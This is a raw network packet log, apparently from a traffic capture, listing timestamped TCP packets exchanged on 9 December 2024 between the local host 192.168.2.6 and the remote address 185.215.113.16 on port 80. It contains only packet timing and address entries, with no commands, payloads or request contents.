                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.986749887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.988823891 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.988867998 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.989562035 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.989605904 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.989967108 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.990006924 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.993875027 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.993932009 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.012381077 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.012518883 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.012574911 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.013540030 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.013587952 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.013609886 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.013650894 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.015568018 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.016252041 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.016308069 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.019016981 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.019609928 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.019685984 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.022598982 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.022840977 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.022897959 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.025887012 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.025938988 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.026324034 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.026375055 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.029438972 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.029479980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.029565096 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.032489061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.032541990 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.032601118 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.035695076 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.035820007 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.035880089 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.038940907 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.039158106 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.039211988 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.042314053 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.042478085 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.042534113 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.045377970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.045669079 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.045747042 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.048640966 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.048715115 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.048896074 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.048974037 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.051908970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.052644014 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.052720070 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.054928064 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.055145979 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.055231094 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.058159113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.058598042 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.058753014 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.061510086 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.061568975 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.061738014 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.061786890 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.064657927 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.064822912 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.064874887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.067787886 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.067887068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.067939043 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.071048975 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.071228027 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.071275949 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.074328899 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.074377060 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.074435949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.074481010 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.077357054 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.077945948 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.078238010 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.078444004 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.081096888 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.081330061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.081388950 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.083914995 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.083966970 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.084302902 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.084382057 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.086966038 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.087236881 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.087337971 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.090176105 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.090329885 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.090421915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.093384981 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.093548059 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.093631029 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.096662998 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.096780062 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.097280979 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.097352982 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.099987984 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.100187063 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.100286961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.103116989 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.103389978 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.103446960 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.106287003 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.106443882 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.106523037 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.109378099 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.109428883 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.109457970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.109693050 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.112723112 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.112852097 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.112907887 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.115880013 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.115963936 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.115979910 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.116029978 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.119013071 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.119961023 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.178858995 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.179291964 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.179459095 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.180227041 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.180324078 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.180329084 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.180425882 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.183028936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.184006929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.184025049 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.184098959 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.186870098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.187098980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.187184095 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.189692974 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.190762997 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.204726934 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.204879045 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.205005884 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.205450058 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.205529928 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.205583096 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.205650091 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.207688093 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.207848072 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.207932949 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.209398985 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.209475994 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.209537029 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.209606886 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.211790085 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.212277889 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.212358952 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.213996887 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.214272976 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.214344978 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.216273069 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.216335058 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.216357946 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.216460943 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.218492985 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.218529940 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.218602896 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.220778942 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.220792055 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.220870972 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.222815990 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.223083973 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.223160982 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.225064039 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.225112915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.225184917 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.225229979 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.227106094 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.227236986 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.227289915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.229146004 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.229198933 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.229418039 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.229466915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.231282949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.231430054 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.231482029 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.233381987 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.233628988 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.233706951 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.235357046 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.235430002 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.235511065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.235584974 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.237320900 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.237396955 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.237915039 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.237987041 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.238598108 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.238687992 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.238858938 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.238933086 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.239845991 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.239923000 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.240216970 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.240287066 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.241096973 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.241168022 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.241242886 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.241309881 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.242470980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.242885113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.242964983 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.243669987 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.243743896 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.243987083 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.244060040 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.244889021 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.245081902 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.245162010 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.246172905 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.246258020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.246540070 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.246618032 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.247432947 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.247508049 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.247617960 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.247684002 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.248662949 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.248753071 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.248882055 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.248950958 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.249962091 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.250031948 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.250154018 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.250225067 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.251173019 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.251688004 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.251755953 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.252657890 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.252732992 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.252798080 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.252868891 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.253789902 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.253868103 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.253884077 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.253942013 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.255067110 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.255136013 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.255139112 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.255196095 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.256372929 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.256443977 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.256674051 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.256742954 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.257520914 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.257592916 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.257664919 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.257729053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.258860111 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.258940935 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.259196997 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.259263039 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.260112047 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.260461092 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.260535002 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.261301041 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.261385918 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.261394978 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.261464119 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.262564898 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.262650013 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:43.263364077 CET8049945185.215.113.16192.168.2.6
